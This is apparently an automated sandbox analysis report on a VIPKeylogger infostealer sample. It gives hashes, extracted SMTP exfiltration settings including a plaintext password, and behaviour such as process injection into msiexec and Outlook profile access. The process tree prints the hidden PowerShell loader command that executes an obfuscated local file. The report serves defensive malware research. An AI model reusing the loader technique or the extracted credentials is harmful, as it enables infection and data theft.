Analysis
max time kernel: 145s
max time network: 160s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 22-10-2024 14:02
Static task: static1

Behavioral task   Sample                      Resource
behavioral1       Rundholterne89.exe          win7-20240903-en
behavioral2       Rundholterne89.exe          win10v2004-20241007-en
behavioral3       Levitator/Exungulate.ps1    win7-20241010-en
behavioral4       Levitator/Exungulate.ps1    win10v2004-20241007-en
General
Target: Rundholterne89.exe
Size: 870KB
MD5: a1e239c4d5116e289ce0597a92844ede
SHA1: 4562d452ccc32512291c3165a0b9b3c076b28094
SHA256: 1e507febdd48a2bf2429c8011bd5cbc5c7b018207bdaec87665b8b51fa13d904
SHA512: 500ddcdc2f1e3ca0da0a43006b99c6e78697433fc0757d25ddff94190dd2d725799faf267efdfacdef758e9024591368454f14025662cc6a1309bce7863494d2
SSDEEP: 24576:/75JHVcDo1hTW+VeQ9Ke+alCJmvulW6Nd0vd:jDHVUW/VrKe+m7mwMAd
Malware Config

Extracted
Protocol: smtp
Host: smtp.ionos.es
Port: 587
Username: [email protected]
Password: pW@4G()=#2

Extracted
Family: vipkeylogger
Protocol: smtp
Host: smtp.ionos.es
Port: 587
Username: [email protected]
Password: pW@4G()=#2
Email To: [email protected]
Signatures

VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C#; it resembles SnakeKeylogger, which was found in 2020.

Command and Scripting Interpreter: PowerShell (1 TTPs, 2 IoCs)
Runs PowerShell with the display window hidden.
Processes:
  pid    process
  624    powershell.exe
  3260   powershell.exe

Accesses Microsoft Outlook profiles (1 TTPs, 6 IoCs)
Processes:
  description   ioc                                                                                                                                                   process
  Key opened    \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676   msiexec.exe
  Key opened    \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676   msiexec.exe
  Key opened    \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676   msiexec.exe
  Key opened    \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676   msiexec.exe
  Key opened    \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676   msiexec.exe
  Key opened    \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676   msiexec.exe

Blocklisted process makes network request (18 IoCs)
Processes:
  flow   pid    process
  39     2612   msiexec.exe
  40     3968   msiexec.exe
  42     3968   msiexec.exe
  43     2612   msiexec.exe
  45     2612   msiexec.exe
  46     3968   msiexec.exe
  48     3968   msiexec.exe
  49     2612   msiexec.exe
  51     2612   msiexec.exe
  52     3968   msiexec.exe
  57     2612   msiexec.exe
  59     2612   msiexec.exe
  62     3968   msiexec.exe
  64     3968   msiexec.exe
  65     2612   msiexec.exe
  67     3968   msiexec.exe
  69     2612   msiexec.exe
  70     3968   msiexec.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 3 IoCs)

Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
  flow   ioc
  56     checkip.dyndns.org

Suspicious use of NtCreateThreadExHideFromDebugger (2 IoCs)
Processes:
  pid    process
  2612   msiexec.exe
  3968   msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (4 IoCs)
Processes:
  pid    process
  3260   powershell.exe
  624    powershell.exe
  2612   msiexec.exe
  3968   msiexec.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTPs, 5 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
  description   ioc                                                          process
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   powershell.exe
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   msiexec.exe
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   msiexec.exe
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   Rundholterne89.exe
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   powershell.exe

Suspicious behavior: EnumeratesProcesses (20 IoCs)
Processes (pid, process, number of events):
  624    powershell.exe   9
  3260   powershell.exe   7
  2612   msiexec.exe      2
  3968   msiexec.exe      2

Suspicious behavior: MapViewOfSection (2 IoCs)
Processes:
  pid    process
  3260   powershell.exe
  624    powershell.exe

Suspicious use of AdjustPrivilegeToken (46 IoCs)
Processes (token, pid, process):
  624 powershell.exe: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  3260 powershell.exe: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  2612 msiexec.exe: SeDebugPrivilege
  3968 msiexec.exe: SeDebugPrivilege

Suspicious use of WriteProcessMemory (14 IoCs)
Processes (pid, process, target pid, target process, number of events):
  1304   Rundholterne89.exe   -> 624    powershell.exe   3
  1304   Rundholterne89.exe   -> 3260   powershell.exe   3
  3260   powershell.exe       -> 2612   msiexec.exe      4
  624    powershell.exe       -> 3968   msiexec.exe      4

outlook_office_path (1 IoCs)
Processes:
  description   ioc                                                                                                                                   process
  Key opened    \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676   msiexec.exe

outlook_win_path (1 IoCs)
Processes:
  description   ioc                                                                                                                                                   process
  Key opened    \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676   msiexec.exe
Processes

C:\Users\Admin\AppData\Local\Temp\Rundholterne89.exe (PID 1304)
  Command line: "C:\Users\Admin\AppData\Local\Temp\Rundholterne89.exe"
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 624)
    Command line: "powershell.exe" -windowstyle hidden "$Ungarnsopholdet197=Get-Content -raw 'C:\Users\Admin\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Exungulate.Spe205';$Ratanhia=$Ungarnsopholdet197.SubString(55438,3);.$Ratanhia($Ungarnsopholdet197)"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\msiexec.exe (PID 3968)
      Command line: "C:\Windows\SysWOW64\msiexec.exe"
      - Accesses Microsoft Outlook profiles
      - Blocklisted process makes network request
      - Suspicious use of NtCreateThreadExHideFromDebugger
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - outlook_office_path
      - outlook_win_path

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 3260)
    Command line: "powershell.exe" -windowstyle hidden "$Ungarnsopholdet197=Get-Content -raw 'C:\Users\Admin\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Exungulate.Spe205';$Ratanhia=$Ungarnsopholdet197.SubString(55438,3);.$Ratanhia($Ungarnsopholdet197)"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\msiexec.exe (PID 2612)
      Command line: "C:\Windows\SysWOW64\msiexec.exe"
      - Accesses Microsoft Outlook profiles
      - Blocklisted process makes network request
      - Suspicious use of NtCreateThreadExHideFromDebugger
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads

(no path recorded)
Filesize: 854B
MD5: e935bc5762068caf3e24a2683b1b8a88
SHA1: 82b70eb774c0756837fe8d7acbfeec05ecbf5463
SHA256: a8accfcfeb51bd73df23b91f4d89ff1a9eb7438ef5b12e8afda1a6ff1769e89d
SHA512: bed4f6f5357b37662623f1f8afed1a3ebf3810630b2206a0292052a2e754af9dcfe34ee15c289e3d797a8f33330e47c14cbefbc702f74028557ace29bf855f9e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize: 1KB
MD5: c403847a7e1759d6de99def3e579d03a
SHA1: df8b9616fce2b758786a0f28498dc0552b954898
SHA256: c69c9183f96bf43cb994e6454be5ff5b2e63b02b99f7defbe18176e8fa77110d
SHA512: f79f34aef3c0d27144aa1e6e95e033696a097d7427a455be7503c95df91c602f1e9c04b61d4fa3e36e87a7e5aefd0fe80914a0166781cbcc503c9633f391945e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_B60DAD4239F8DBB7FDA230724F9F9DFD
Filesize: 471B
MD5: d27e8f4f186e50ed883dc1676cbb4038
SHA1: 4dc99e2f5a1b7eafbceb0b837d9030424d67d8a4
SHA256: ea5e76383ebf4550a6d4f3e561534cdbda582899df18c32c1ae085e0b1ff9ed8
SHA512: 3f6c599fdc2eaf4b42b1b594226438cc4d9b3a7846577b16307023c355757b794b1305b260c0d9e0071483e709dc7d5d190ba89ef3808185b4cd2d529c932372

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_3459237E893F04A4596206DC25825D64
Filesize: 472B
MD5: fff9aba6fe7a03ac24297af4a6ef7600
SHA1: 7ed4438da3b2bd2080a577c149f0029337d68fe8
SHA256: 510ed87ce53d8777b77a0de99754d355529f7f2f9e9a05690b927d1ced4dbe92
SHA512: 86b21267b1379717e414a374f113556c779246026569ab0adbda017d68532a62bd8999e5deb49f059b76c0c10ea15ca40e251f7efc5bdddbac7114ee002342c8

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199
Filesize: 170B
MD5: 0617862da103d7d6d9331420105cdb69
SHA1: d035931277d2d0e40496acda69b584d965f877c5
SHA256: c41c91588ab269c507d23c8a6dbf7e060fc172887707050702901b7aee26cc38
SHA512: 4857a30ba0a82242f59da21fd22b1b55f452f384a7320d987cb4c0ea7260484d0a748cb0c2bb98ec18d1ab5e1c99ddf7bfb4ca22792d72db1bc9a6032b93d618

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize: 410B
MD5: 96331c468bd6b1b7fe9e8d972c9a0bf8
SHA1: e230eebb04dccb366028cbff8ce7df8c203e3821
SHA256: d77a65658628b6fc9d4e99bfeb5d3c892c0f83e37d6cdc628b3a8679ea76bc04
SHA512: eb8d40e788defcc55cdc302d63cce825972a6a1778935e9316629d95f1f71f98ed75b819f5cfa2cf4a2b556358b3f4fcfb42e45d538d046e9ab7e9e143c20847

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_B60DAD4239F8DBB7FDA230724F9F9DFD
Filesize: 406B
MD5: 7312e24a52cfc49e78d51926a4aa1b82
SHA1: e62e828673c0bf659034290e82bc790a80000a16
SHA256: fd1af1b63a6f760dcfdf5a445e333b99d9b8e35e5d7d2514af553d9f6d4a4147
SHA512: 379e5aa633c6d98eb7aa71a8710f33766463cb785ebcbc6e15c9faa985481446d5dde88c0593d0727ace7528f069ae9bedca1258a97a55189b16a77bb34fc51a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_B60DAD4239F8DBB7FDA230724F9F9DFD
Filesize: 406B
MD5: 9247f031a3a69f2e64081c178c96aa48
SHA1: 0814e34a2e58e09954aa6a7c0d7ccbfad1a1a71d
SHA256: bf17f5978ad0367951e80606ec21d25d87be81b1d865d7da2db897f70d9d81aa
SHA512: aa42c76a8a25595261ec1759a196ef51361815edadb8657c386592a63362f91a53d8293bfdf2d500a0564e018efff9961da3529781dc3276d1903424f703fa08

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_3459237E893F04A4596206DC25825D64
Filesize: 402B
MD5: da5a3eb289a81a340aee6fd5563e959d
SHA1: feb0d479497ecd3a96d6c9acc440b4693129d39c
SHA256: 6c0ce5c5b1434e14c0ee13086da6572fcab891c8baca80f19b202874f4685d29
SHA512: 92b6edb70da1030238fd1c60f0b7ba9578c17e7aa54eba77f48b95403156193de7c3e240148769f62d56f77f594ca93dd727711cf441f781d1c388b24e6dd9de

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_3459237E893F04A4596206DC25825D64
Filesize: 402B
MD5: 49546f238a6ad64b3281fa0344a30b57
SHA1: 1082e1a233f638f56bd905a18007c6e63e82ea0c
SHA256: 059eee06e6b711b7ca43e898621eef7c70ab16fd4ec7e8898872d8fd194da8f0
SHA512: 15a6a8d353520706fcfd31a91ad4db204cec8ccc871e88847b0e5c8ec4a07917bb402a641a683175c1b571c60f9ce8c744926b09695dada68fd9eee09cf908c2

(no path recorded)
Filesize: 53KB
MD5: 01404e51f6442f60e478c306b1e6e52e
SHA1: 37f234ccf5611b8309023410ceb9e76ad81f5678
SHA256: d4356dd23aa2e811712132f9718786331661a1bd0d062c49cb76807b9563928b
SHA512: 94a9d843ae4055e2a9b412f03cba85e2d7b804ec3106f059d14ca50b15ae4acc6cd452f9461c2e21d1632d06848c969732c539aea17869b8b3a2f5ab93b891d7

(no path recorded)
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

(no path recorded)
Filesize: 54KB
MD5: 0d2ce39822e9236a380f4d1d53550e93
SHA1: 8381b0e62708112dbfbed036650bf0667ec4476b
SHA256: ed34db2a55a35c90b524d2448353eb73d28da7d7ff401477165c226ff25de9af
SHA512: f365bb861db3fc6d29736b3f8c0377bb4f8318fff94bc96033ae208760082b529b8aea4cf79de9efa3608c79ac91fe57e19f26959831f621bba8816e1013afc3

(no path recorded)
Filesize: 332KB
MD5: d3086578d45d821207eac6cbb8e24a2b
SHA1: 0772cbce5403edae1aab6310b2f58d7f99c726c0
SHA256: e856fc4f6b157e7799c1af872064cd1be9f982b1a5d18d7b16e5c3a48e3a1b1a
SHA512: 7db853becc19b209c0534c8f09635c55dab9bc540bd138054c2e84bbfc396bfa587bd4549a7188824f95271c04894bb7c66795f75267bca16620bc27ed38807d